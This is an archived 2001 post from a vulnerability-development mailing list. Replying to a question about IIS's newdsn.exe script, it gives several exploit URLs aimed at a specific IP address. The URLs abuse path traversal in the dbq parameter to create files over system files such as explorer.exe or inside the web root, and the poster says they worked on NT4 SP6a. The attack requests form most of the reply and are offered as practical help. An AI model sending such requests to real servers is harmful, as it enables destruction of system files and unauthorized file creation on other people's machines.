Vulnerability Development mailing list archives

Re: FW: IIS + M$ Proxy II

From: Reverend Lola <reverend_lola () YAHOO COM>
Date: Thu, 8 Mar 2001 10:38:00 -0800

-----Original Message-----
From: sekure [mailto:sekure () HADRION COM BR]
Subject: IIS + M$ Proxy II

And i only can detect this file:
xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe

I saw a example there of this context:

xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?c=Microsoft\%2B"."Access\%2BDRIVER\

%2B\%28*.mdb\%29\&dsn=wicca\&dbq="


Looks like you missed a bit.  Try something like:

http://64.162.37.18/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=dsn_name&dbq=file_name&newdb=CREATE_DB&attr=

A few examples (these worked on NT4 SP6a):

http://64.162.37.18/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=dsn_name&dbq=/../../explorer.exe&newdb=CREATE_DB&attr=

or:

http://64.162.37.18/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=dsn_name&dbq=/../../inetpub/wwwroot/foo.html&newdb=CREATE_DB&attr=


Hope this helps,

Reverend Lola
The Titanium Sheep
Provider of the Blessed Steel Wool




__________________________________________________
Do You Yahoo!?
Get email at your own domain with Yahoo! Mail.
http://personal.mail.yahoo.com/

Current thread:

IIS + M$ Proxy II sekure (Mar 07)
- Re: IIS + M$ Proxy II H D Moore (Mar 08)
- <Possible follow-ups>
- Re: FW: IIS + M$ Proxy II Reverend Lola (Mar 08)